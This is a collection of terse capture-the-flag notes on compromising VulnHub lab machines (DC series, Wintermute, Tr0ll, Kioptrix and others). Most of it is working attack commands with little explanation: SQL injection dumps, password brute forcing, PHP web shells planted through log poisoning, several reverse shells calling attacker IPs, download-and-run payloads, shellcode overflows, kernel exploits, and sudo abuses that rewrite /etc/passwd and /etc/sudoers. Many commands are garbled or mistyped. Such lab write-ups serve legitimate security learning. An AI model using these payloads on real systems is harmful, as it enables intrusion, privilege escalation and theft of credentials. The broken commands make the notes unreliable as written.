Cracking Linux credentials.
​

searchsploit drupal

Drupal /usr/share/exploitdb/exploits/php/webapps/34992.py - druapl sql injection

upload reverse shell and back to the connection
​
find / -perm 4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find . -exec '/bin/sh' \;
​
find / -name flag*
​
find /root/thefinalflag.txt -type -type f -exec cat '{}' \;
​

===================================================

DC 2 walkthrough

nmap -sn 10.0.2.0/24

Wordpress exploit

wpcan --url //dc-2 --enumerate u --enumerate p --enumerate t

cewl http://dc-2 >password

wpscan --url ip -U users -P password

ssh [email protected] -p 7744

vi used because of restricted shell

vi

:set shell=/bin/bash

After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and “/usr/bin” as our PATH environment variable so that we can run Linux commands properly.

export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL
​
sudo -l
/usr/bin/git
sudo git help add
!/bin/bash

So, I tried to login to this SSH service using the extracted credentials and I succeeded. But I can not run any Linux command. This happened because the shell is restricted shell. So, I tried to escape it using VI editor.

vi
:set shell=/bin/sh
export PATH=$PATH:/bin:/usr/bin

====================================

Dc3

Penetrating Methodology:
Discovering Targets IP
Network scanning (Nmap)
Surfing HTTP service port
Searching exploits via searchsploit
Using SQLMAP to dump databases information
Using John the Ripper to Crack the Password
Login into JOOMLA
Inject malicious PHP Reverse Shell Code
Using Netcat for obtaining reverse connection
Exploit the kernel
Getting root access
Reading Final flag

joomla exploit joomla 3.7

joomscan -url http://192.168.56.101 -enumerate-components

joomla sql injection
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch
john hash
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt --force

After spending some time exploring, we got an idea to add a malicious PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting reverse shell as shown below.

​https://www.tunnelsup.com/hash-analyzer/

beez3 template -> reverse shell

In my journey, I came across an interesting page – Extensions > Templates

nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -a
​
ubuntu 16 exploit
cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39722.zip
ls
cd 39772
ls
tar -xvf exploit.tar
ls 
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd root
ls
cat the-flag.txt
​
(find / -perm -u=s -type f 2>/dev/null)
ntfs-3g
​
4.4.x 
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
​

=======================================================

dc 4 walkthrough

nmap -A 192.168.1.101

We Fired UP!! burpsuite using rockyou.txt to get valid login. Username- admin

After bruteforcing, we have found the password for Admin i.e Password- happy

command .php Let’s check out subdirectories in the /home directory. We have found 3 users i.e Charles, Jim and Sam.

old.passwords.bak

hydra -L users -P passwords 192.168.1.101 ssh

Username- jim Password- jibril04 ssh [email protected]

After some time thinking, it suddenly strikes us to check the /var/mail folder. Maybe it might contain something, and our instinct was right. We have found some credentials.

Username- Charles Password- ^xHhA&hvim0y

one exploit through adding sudoers, cronjobs and /etc/passwd

sudo -l echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

2nd blog

radio=nc -nv ip port -e /bin/bash&submit=run

nc lvnp 4444

echo " * root chmod 4777 /bin/sh" | sudo teechee -a /etc/crontab

3rd way for priv escalation

echo "jim ALL=(ALL:ALL) ALL" | sudo teechee -a /etc/sudoers

hydra -l jim -P pass.txt ssh://192.168.2.113

​https://gtfobins.github.io/​

echo “charles ALL=(ALL:ALL) ALL” | sudo teehee -a /etc/sudoers

==================================================================

dc-5 walkthrough

nmap -A 192.168.1.108
LFI
wfuzz -w /usr/share/wfuzz/wordlist/general/test.txt -w /usr/share/wordlist/injections/lfi.txt http://ip/thankyou.php?FUZZ=FUZZ

Therefore, I Quickly checked for LFI Vulnerability by obtaining the /etc/passwd file as shown below.

file=/var/log/ngnix/access.log Let’s capture the request of the Nginx Access log file using Burpsuite. Here we will be using LFI to exploit apache access log.

In place of the file path, we have injected a Code to get the command line access by making a GET request to the Server.

<?php system($_GET['cmd']) ?>

So, I tried to view many files like : /etc/passwd, /etc/shadow, & /var/log/nginx/access.log. I found that some of them can be viewed (passwd & access.log).

2nd method

curl -A "<?=system('nc -nv ip 4444 -e /bin/bash');?>" http://ip/thankyou/php​

To verify that it is working or not, we have added a new parameter to the URL i.e &cmd=id. Therefore from the output, it confirms we have successfully executed the command on the server. /var/log/ngnix/error.log&cmd=id

nc -e /bin/bash 192.168.1.110 1234

Privilege Escalation

find / -perm -u=s -type f 2>/dev/null

screen 4.5 searchsploit screen 4.5.0 searchsploit -m 41154

gcc -fPIC -shared -ldl -o libhax.so libhax.c gcc -o rootshell rootshell.c

wget http://192.168.1.110:8000/41154.sh

wget http://192.168.1.110:8000/libhax.so

wget http://192.168.1.110:8000/rootshell​

Screen exploit

==================================================

Web Developer 1

nmap -sn ip/24

nmap -A -p- ip

whatweb ip wpscan --url http://ip I found that there is an interesting directory called “ipdata” with directory listing option enabled.

After viewing this directory using firefox, I found that it contains packet capture file called “analyze.pcap”.

After downloading, opening, and analyzing the file using wireshark, I found that it contains a request to the WordPress admin area. That request contains the credentials for the WordPress.

username : webdeveloper password : Te5eQg&4sB!Yr$)wf%(DcAd

ssh [email protected] sudo -l

use exploit/unix/wepapp/wp_reflexgallery_file_upload

set rhosts 192.168.19.131 exploit

So, we can execute a file using tcpdump, so we use the following command to execute “ls -al /root” command. Now the command will be executed only when tcpdump captures a packet.

COMMAND='ls -al /root'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

After starting tcpdump, in a new terminal, we connect to the target machine through SSH. Now we send a TCP packet to the 127.0.0.1 using netcat. We had to use this locally as we started tcpdump on the loopback interface.

nc -v -z -n -w 1 127.0.0.1 1

As soon as we send the packet, our command is executed and we can see all the files inside “/root” directory. Inside “/root” directory, we find a file called “flag.txt”. We are again going to use tcpdump command to open “flag.txt” and are able to get the final flag.

COMMAND='cat /root/flag.txt'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
​

2nd method for user shell

From here, I have to upload a reverse webshell to the server so that I can run commands and tried rooting it. There are many ways I can follow to do this, like using metasploit module (exploit/unix/webapp/wp_admin_shell_upload) or uploading it by editing the themes or Plugins “PHP” files.

exploit/unix/webapp/wp_admin_shell_upload

/usr/share/webshells/php/php-reverse-shell.php

Wordpress Shell

3- Visit appearance –> Editor .
4- Select “404.php” theme file.
5- paste the updated content of “php-reverse-shell.php” on the text area and press “Update File” button.
​
Appearance -> editor -> 404.php
​

3rd method for Wordpress user shell

wordpress
Plugins -> Editor -> akismet.php
Visit: http://IP HERE/wp-content/plugins/akismet/akismet.php
​
Now find something to edit on the WP site that will give us code execution. I chose to edit the akismet plugin via Plugins -> Editor -> akismet.php
​
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0&>1'"); ?>
​
nc -lvnp port

2nd method for tcpdump root shell

echo $'php /var/www/html/wp-content/themes/twentysixteen/404.php' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i ehh0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
​
from attacker machine - nc -lvp 4444

3rd method for tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

3rd method for root shell Research Googling lxd group privilege escalation brought me here:

​https://reboare.github.io/lxd/lxd-escape.html It basically says we can abuse the lxd group to re-mount the filesystem and change root owned files.

We can run the commands on the above page, mostly as-is, in order. Just have to run lxd init first and follow the prompts as seen below:

lxd init
lxc init ubuntu:16.04 test -c security.priviled=true
lxcc config device add test whatever disk source=/ path=/mnt/root recursive=test
lxc start test
lxs exec test bash
​
editing sudoers
echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /mnt/root/etc/sudoers
​
sudo su -

==============================================================

Linux Priv Escalation

Using zip command

$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

Using tar command

$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash

Using strace command

$ sudo strace -o/dev/null /bin/bash

Using tcpdump command

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell $ chmod +x /tmp/.shell $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root

Using nmap command

$ echo "os.execute('/bin/sh')" > /tmp/shell.nse $ sudo nmap --script=/tmp/shell.nse

Using scp command

$ sudo scp -S /path/yourscript x y

Using except command

$ sudo except spawn sh then sh

Using nano command

$ sudo nano -S /bin/bash type your command and hit CTRL+T

Using git command

$ sudo git help status type: !/bin/bash

Using gdb/ftp command

$ sudo ftp type : !/bin/sh

​https://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/​

mysql select sys_exec('whoami');

select sys_eval('whoami');

​
# Common locations for user installed software
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/
​
mail check
/var/spool/mail
​
services check
# Linux
netstat -anlp
netstat -ano
​
cp
Copy and overwrite /etc/shadow
​
find
​
sudo find / -exec bash -i \;
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
​
less
​
From less you can go into vi, and then into a shell.
sudo less /etc/shadow
v
:shell
​
Cronjob
With privileges running script that are editable for other users.
Look for anything that is owned by privileged user but writable for you:
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
​
​
Unmounted filesystems
Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.
mount -l
cat /etc/fstab

-========================================================

solidstate walkthrough

nmap 10.10.10.51 -sV -p- --open

Now back to 4555, it runs service James Remote Admin 2.3.2. After searching a while on the internet, I got that the default password for logging in the Remote Admin is root: root.

listusers command setpassword command listusers

pop3 service smtp telnet 10.10.10.51 110 User: mindy Pass: 1234 list

we got mindy credentials login with ssh

Apache james server 2.3.2 https://www.exploit-db.com/exploits/35513/

RCE change the exploit ip and port ./exploit.py ip

ssh [email protected]

python -c 'import pty;pty.spawn("/bin/bash")'

start nc listener before exploit execute

priv escalation ps aux | grep james

As given below in image you can see I had edit netcat backdoor using the following command and save the file tmp.py, then transfer this file into victim’s system.

!/usr/bin/env python

import os import sys os.system('/bin/nc -e bin/bash ip port')

crontab -l

===============================================================

wintermute

nmap -p- -A ip port 3000 http service running

admin admin /turing-bolo

lfi find in 80 port bolo=case bolo=../../log/mail

further connect to smtp port 25 telnet ip 25

MAIL FROM:[email protected] 220 straylight ESMTP Postfix (Debian/GNU) 250 2.1.0 Ok RCPT TO:<?php system('whoami'); ?> 501 5.1.3 Bad recipient address syntax

Now navigate back to the URL http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail​

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f elf > shell.elf

RCPT TO:<?php system('cd /tmp; wget http://192.168.1.134/shell.elf'); ?>
501 5.1.3 Bad recipient address syntax
RCPT TO:<?php system('chmod 777 /tmp/shell.elf'); ?>
501 5.1.3 Bad recipient address syntax
RCPT TO:<?php system('/tmp/shell.elf'); ?>
501 5.1.3 Bad recipient address syntax
​
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.134
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
​
find / -perm -4000 2>/dev/null
​
​
screen 4.5

2nd method

By going to http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=case
​
​
http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=../turing-bolo/case
http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=/var/www/html/turing-bolo/case
​
http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail
​
 nc 192.168.56.102 25
220 straylight ESMTP Postfix (Debian/GNU)
MAIL FROM:<[email protected]>
250 2.1.0 Ok
RCPT TO:<?php echo system($_POST['cmd']); ?>
501 5.1.3 Bad recipient address syntax
​
Note: I used POST not GET for this
​
With the log file poisoned I just had to trigger it
​
curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=id"
​
curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=which nc"
​
curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=nc 192.168.56.101 4444 -e /bin/bash"

Root Hunting Round 1

python -c "import pty;pty.spawn('/bin/bash')"

find / -perm -u=s 2>/dev/null

​https://www.exploit-db.com/exploits/41154 nc -nvlp 2222 < exploit.sh

3rd method

<?php echo shell_exec($_GET['cmd']);?>

perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.30.128%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27

​https://www.exploit-db.com/exploits/41154/​

Next machine pivoting

​
https://www.exploit-db.com/exploits/41154/
​
Next machine pivoting
​
cat note.txt
​
/struts2_2.3.15.1-showcase
​
arp -a
nc -znv 172.16.0.1 1-60000
​
socat tcp-listen:8080,fork tcp:172.16.0.1:8080 &
socat tcp-listen:34483,fork tcp:172.16.0.1:34483 &
​
searchsploit apache struts
python struts-pwn.py -u http://192.168.1.83:8080/struts2_2.3.15.1-showcase/showcase.action --check
​
python struts-pwn.py -u http://192.168.1.83:8080/struts2_2.3.15.1-showcase/showcase.action -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.0.2 443 >/tmp/f"

Access to Neuromancer has been achieved! Checking the homedirectory of the “ta” user will reveal something of interest. This note will reveal the tomcat directory.

ssh [email protected] -p 34483

​https://www.exploit-db.com/exploits/44298 scp -P 34483 exploit [email protected]:.

2nd method for 2nd machine

I used a bash one-liner to calculate which IPs had hosts up on the 212 range, if the host was up the words "bytes from" would be in the output so I could grep pings

for i in $(seq 1 255); do ping -c 1 192.168.212.$i; done | grep "bytes from"
for i in $(seq 1 65535); do nc -nvz -w 1 192.168.212.4 $i 2>&1; done | grep -v "Connection refused"

As it was, I used it to tunnel each port onto the 56 range

[email protected]:/tmp# socat TCP-LISTEN:8009,fork,reuseaddr TCP:192.168.212.4:8009 &
[1] 14514
[email protected]:/tmp# socat TCP-LISTEN:8080,fork,reuseaddr TCP:192.168.212.4:8080 &
[2] 14521
[email protected]:/tmp# socat TCP-LISTEN:34483,fork,reuseaddr TCP:192.168.212.4:34483 &
[3] 14524
​
# socat tcp-listen:8009,fork tcp:192.168.40.129:8009 &
# socat tcp-listen:8080,fork tcp:192.168.40.129:8080 &
# socat tcp-listen:34483,fork tcp:192.168.40.129:34483 &
​
nmap -sV -p- ip
8080 tomcat 9.0

​

I found an exploit for this on exploit-db https://www.exploit-db.com/exploits/42324, but to be able to make it call back with a shell I needed to forward a port the other way

[email protected]:/tmp# socat TCP-LISTEN:6666,fork,reuseaddr TCP:192.168.56.101:6666 &
[1] 20999
And opened a listener for it
​
[email protected]:~# nc -nvlp 6666
​
python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "nc 192.168.212.3 6666 -e /bin/bash"
​
python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "nc 192.168.212.3 6666"

I couldn't get any reverse shells to fire, and I suspected this was because Java Runtime didn't support linux piping etc. So I decided to transfer a file to execute and spawn the reverse shell, first I needed to expose my port 80 to the target so it could get the file

Struts Exploit

socat TCP-LISTEN:8888,fork,reuseaddr TCP:192.168.56.101:80 &
​
And then setup a file in /var/www/html called callback.sh which contained
​
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.212.3 6666 >/tmp/f
​
apache2ctl start
​
python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.212.3:8888/callback.sh -O /tmp/callback.sh"
​
python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/callback.sh"
​
python ./struts.py http://192.168.56.102:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/callback.sh"
​
​
$ uname -a
Linux neuromancer 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
​
https://www.exploit-db.com/exploits/44298
​
gcc priv.c -o priv

===============================================================

me and my girlfriend vulnhub machine

nmap -p- -A 192.168.29.148

Without wasting time, I had edited the rule for the request header for x-forwarded-for: localhost in the burp suite and try to intercept the web page request along this.

And finally, you will be able to access the web page for the Ceban Corp company as said by the author. On this page I saw 4 captions that contain some hyperlink. Here I tried to figure out the possibilities for SQL injection and LFI but failed to bypass this.

Once I logged in, I saw another their three captions “Dashboard, Profile, logout”. The profile caption denoted user_id and for raj, it is showing user-id=12 in the URL.

In the given URL, I tried to change user_id from user_id=12 to user-id=1 and luckily I saw the profile for another user, then frequently found the profile for alice as user_id=5, Moreover, the password field was auto filed thus I was able to read the password from inside the inspect element.

Username: alice Password: 4lic3

Spawning shell Since we have enumerated credential for the user alice therefore, further I used this credential to access host machine shell through ssh.

ssh [email protected]

Privilege Escalation Without wasting time, I looked for sudo rights and fortunately found that alice can run the php program as a sudo user. Then I start the netcat listener in a new terminal and run the php reverse shell command in the host terminal.

sudo /usr/bin/php -r '$sock=fsockopen("192.168.29.157",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

nc -lvp 1234 cd /root ls cat flag2.txt

=============================================================

troll 1

nmap -p 1-65535 -sV -sS -A -T4 192.168.78.140 nmap --script=http-enum -p80 -n 192.168.78.140

ftp 192.168.78.140 ftp> get lol.pcap

I took a guess and entered sup3rs3cr3tdirlol as a dir:

strings ~/Downloads/roflmao

The binary appeared to just print “0x0856BF”, I entered this in the browser again - not expecting it to work.

SSH Brute Force

I manually attempted a SSH brute force using the previously discovered usernames + password from Pass.txt. After several attempts the connection was refused via SSH, rebooting the target VM did not help - I suspected iptables, fail2ban / DenyHosts.

:# wget http://attacking-machine/exploits/enumeration/lin/linux-local-enum.sh -P /var/tmp/ && chmod 700 /var/tmp/linux-local-enum.sh && ./var/tmp/linux-local-enum.sh
​

Weak Filesystem Permissions The enumeration script identified the following world writable files:

​
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/lib/log/cleaner.py
​
Enumeration Findings
/lib/log/cleaner.py was owned by root and executed by cron to clean out /tmp

Local Privilege Escalation From the attacking machine I downloaded an suid bin (spawns a shell) to /usr/bin/suid on the target.

Exploiting the poor filesystem permissions, I swapped out the contents of /lib/log/cleaner.py for:

#!/usr/bin/env python
import os
import sys
try:
    os.system('chown root:root /var/tmp/suid; chmod 4777 /var/tmp/suid')
except:
    sys.exit()
​
​

Ubuntu version 14.04

/exploits/linux/local/37292.c

nmap -Pn -sT -A -p- -T4 troll

​https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1328​

========================================================

Troll 2

Some of the things I learned from this VM were enumeration, metadata collection, Shell Shock, SSH Private Keys, Buffer Over Flows/Priv Esc, and TO NEVER GIVE UP!!! This VM is super fun so lets jump right in!!!

netdiscover -r 10.10.10.0/24
nmap -sV -p- 10.10.10.131
dirb http://10.10.10.131/ /usr/share/wordlists/dirb/big.txt
dirb http://10.10.10.131/ /root/Desktop/tr0ll_2/troll_dir.txt

Cracking the zip file : fcrackzip -u -D -p troll_cats/output.txt lmao.zip

sed 's./..g' robots.txt

ssh closed after connecting

ssh closed after connecting
​
ssh -i noob [email protected] '() { :;}; cat /etc/passwd'
ssh -i noob [email protected] '() { :;}; /bin/sh'
python -c 'import pty; pty.spawn("/bin/bash")'
​

1st method For decryptinng base64 strings library

import base64
import subprocess
content = [line.rstrip('\n') for line in open('answer.txt')]
file = open('output.txt', "w")
for id in range(0, len(content)):
read_line = content[id]
write_line = base64.b64decode(read_line)
file.write("%s" % write_line)
file.close()
​

2nd method :#

base64 -d answer.txt > answer-decoded.txt && awk '{print length, $0;}' answer-decoded.txt | sort -nr | less

wget http://172.31.31.6/y0ur_self/answer.txt​

SSH Shellshock

Attempting to login using the discovered key failed, with a messaging saying TRY HARDER LOL!.

ssh -i noob [email protected] '() { :;}; /bin/bash'

for eip crash ./r00t $(python -c 'print "A" 300') ./r00t $(python -c 'print "A"268 + "\x80\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

./r00t $(python -c 'print "A"268 + "\x80\xfb\xff\xbf" + "\x90" 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89 xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

./r00t $(python -c 'print "A"268 + "\x80\xfb\xff\xbf" + "\x90" 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

==========================================================

Pinky palace 1 (Squid proxy)

netdiscover -i eth1 -r 192.168.56.101/24
nmap -sV -T5 -sC -p- 192.168.56.103
8080/tcp  open  http       nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: 403 Forbidden
31337/tcp open  http-proxy Squid http proxy 3.5.23
|_http-server-header: squid/3.5.23
|_http-title: ERROR: The requested URL could not be retrieved
64666/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey: 
dirb http://192.168.56.103:8080/
​
sqlmap --proxy=http://pinkys-palace:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://pinkys-palace:8080/littlesecrets-main/login.php --level=5 --risk=3 --dump-all
​

It was at this point that I wondered if maybe adding a record to /etc/hosts to resolve pinkys-palace to 192.168.56.103 would work.

python -c "print 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd0\x47\x55\x55\x55\x55'" > output
./adminhelper `cat output`
​
ssh [email protected] -p 64666
​
[email protected]:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ base64 -d .ultrasecret > ~/decoded 
[email protected]:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cd
[email protected]:~$ ssh [email protected] -p 64666 -i ~/decoded

2nd blog

# nmap -O -sT -sV -p- -T5 10.0.0.5
# curl http://127.0.0.1:8080 -x 10.0.0.5:31337
# dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 10.0.0.5:31337
# sqlmap --proxy=http://10.0.0.5:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --level=5 --risk=3 --dump users
# hashcat -a 0 -m 0 d60dffed7cc0d87e1f4a11aa06ca73af /usr/share/wordlists/rockyou.txt
Logging in to ssh pinkymanage : 3pinkysaf33pinkysaf3

kioptix level 1 walkthrough

[email protected]:~# nmap -sn 192.168.1.10/24

[email protected]:~# nmap -sT -sV -A -O -v -p 1–65535 192.168.1.17

Port 22 — Inspecting SSH — OpenSSH 2.9p2 searchsploit openssh

Port 80/443 — Inspecting Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

There is one mod_ssl exploit that matches out version :- Apache/mod_ssl (< 2.8.7) OpenSSL — ‘OpenFuckV2.c’ Remote Exploit (2)

[email protected]:~/Desktop/B2R# cp /usr/share/exploitdb/platforms/unix/remote/764.c . [email protected]:~/Desktop/B2R# head 764.c

Openfuck exploit steps - https://github.com/heltonWernik/OpenLuck
Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenFuck.git
Install ssl-dev library
apt-get install libssl-dev
It's Compile Time
gcc -o OpenFuck OpenFuck.c -lcrypto
Running the Exploit
./OpenFuck
See which service you witch to exploit. For example if you need to Red Hat Linux, using apache version 1.3.20. Trying out using the 0x6a option ./OpenFuck 0x6a [Target Ip] [port] -c 40
for example:
​
openfuxk - https://gist.githubusercontent.com/Kan1shka9/c2e112874366b0bdb7ea5005a06d7e41/raw/e5c3caef0b917a6bc2fa8c94f2540a8642dfc80a/764.c
./OpenFuck 0x6a 192.168.80.145 443 -c 40
​
gcc -o OpenFuck 764.c -lcrypto
./OpenFuck 0x6a 192.168.1.17 -c 41
​
Port 111/139 — Inspecting rpcbind/samba
mbclient --list=192.168.1.17 - to get samba version

Samba 2.2 [Samba 2.2.1a]

Remote Root exploit - 10.c - samba 2.2.8

cp /usr/share/exploitdb/platforms/linux/remote/10.c . gcc 10.c -o samba

2nd blog

nbtscan 192.168.36.129 About Samba Trans2Open Overflow –

3rd blog

nmap -sn -T4 -oA nmapfast ip/24 cat nmapfast.gnmap | grep Up | cut -d " " -f2 > livehost

nmap -sT -sV -T4 -p 1-65535 --open -Pn -iL livehost -oA nmapscan

nikto -host ip -port 443

​https://medium.com/@bondo.mike/vulnhub-kioptrix-level-1-d439aa7039b2​

one more samba exploit searchsploit samba 2.2.8

gcc -o sambaexploit /usr/share/exploits/exploits/

======================================================